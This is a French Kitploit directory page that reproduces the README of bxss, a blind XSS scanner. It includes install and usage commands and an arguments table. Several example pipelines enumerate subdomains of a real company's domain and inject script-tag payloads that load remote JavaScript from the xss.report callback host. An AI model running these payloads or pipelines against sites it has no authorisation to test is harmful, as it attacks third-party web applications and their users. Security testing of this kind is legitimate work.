Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
bxss — Blind XSS Scanner est un outil qui peut être utilisé pour scanner les vulnérabilités XSS aveugles dans les applications web. | Kitploit
Outils/GitHubGitHub/ethicalhackingplayground/bxss
Scanners de VulnérabilitésScanners de Vulnérabilités WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubethicalhackingplayground/bxss

bxss

Blind XSS Scanner est un outil qui peut être utilisé pour scanner les vulnérabilités XSS aveugles dans les applications web.

Voir le dépôt
41855il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager


Bxss
Bxss - Scanner XSS Aveugle

Version License Go Report Card Go Reference


🚀 Description

Bxss est un scanner XSS aveugle haute performance qui automatise la détection des vulnérabilités XSS aveugles dans les applications web.


✨ Fonctionnalités

  • Injecte des charges utiles XSS aveugles dans les en-têtes et paramètres personnalisés
  • Prend en charge plusieurs méthodes HTTP (PUT, POST, GET, OPTIONS)
  • Analyse à grande vitesse avec support de la concurrence
  • Facilement chaînable avec d'autres outils
  • Installation et utilisation simples

🧠 En cours

Nous travaillons activement à l'intégration d'un pool de workers basé sur Chromium pour améliorer les performances de bxss sur les appareils bas de gamme.

Cette fonctionnalité permettra de décharger les tâches gourmandes en ressources, comme la détection XSS basée sur le DOM ou l'inspection des charges utiles après déclenchement, vers des instances Chromium légères gérées via un pool. En répartissant la charge de travail sur plusieurs contextes de navigateur sans tête de manière contrôlée et efficace, bxss restera réactif et utilisable même sur des machines moins puissantes.

Cela rendra bxss non seulement puissant mais aussi très accessible, quelles que soient les contraintes système.


✅ À faire

  • Pool de workers basé sur Chromium pour l'interaction DOM et la vérification visuelle
  • Sortie de rapport HTML/JSON optionnelle
  • Ajout de la prise en charge de la personnalisation des charges utiles multi-plateformes (XSS Hunter, Interactsh, etc.)
  • Support proxy
  • Import de requêtes personnalisées

🧪 Fonctionnalités expérimentales

  • Mode Trace (expérimental)

📦 Installation

root@kitploit:~
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

⚙️ Arguments


🎬 Démonstration

Demo


📝 Qu'est-ce que le mode Trace ?

Le mode Trace est une fonctionnalité expérimentale qui vous permet de suivre où le BlindXSS a été déclenché. Certaines plateformes tierces BlindXSS comme https://xss.report/ vous permettent de spécifier des paramètres personnalisés dans vos charges utiles. Cela vous permet de suivre où le BlindXSS a été déclenché. Par exemple, si vous spécifiez le paramètre url=https://somehost.com dans votre charge utile, l'outil utilisera la charge utile

root@kitploit:~
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

pour les tests et lors d'un déclenchement, vous pourrez inspecter le DOM et voir depuis quel hôte le BlindXSS a été déclenché.

Xss Report

Assurez-vous, lors de l'attribution de paramètres personnalisés dans votre tableau de bord, d'attribuer url={LINK} afin que bxss puisse remplacer automatiquement {LINK} par l'URL réelle.

🔥 Exemples d'utilisation

Paramètres

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

Ajouter aux paramètres

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

En-têtes et paramètres

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

En-tête X-Forwarded-For

root@kitploit:~
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

En-têtes et paramètres personnalisés

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Google Dorks avec Dorki

root@kitploit:~
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

En-têtes et paramètres personnalisés avec limite de débit

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

Pour le dorking avancé et l'exploration des vulnérabilités, consultez Dorki et inscrivez-vous dès aujourd'hui !


☕ Soutenir le projet

Si vous obtenez une prime en utilisant cet outil, pensez à me soutenir en m'offrant un café !

Buy Me A Coffee

Télécharger l’outil
ArgumentDescriptionDefault
-aAjouter la charge utile au paramètrefalse
-c intDéfinir le niveau de concurrence30
-H stringDéfinir un en-tête personnalisé""
-hf stringChemin vers un fichier contenant des en-têtes""
-p stringLa charge utile XSS aveugle""
-pf stringChemin vers un fichier contenant des charges utiles""
-tTester les paramètres pour XSS aveuglefalse
-X stringMéthode HTTP à utiliser""
-vActiver le mode débogagefalse
-rl floatLimite de débit (requêtes par seconde)0
-fSuivre les redirectionsfalse
-lActiver le mode Trace (expérimental)false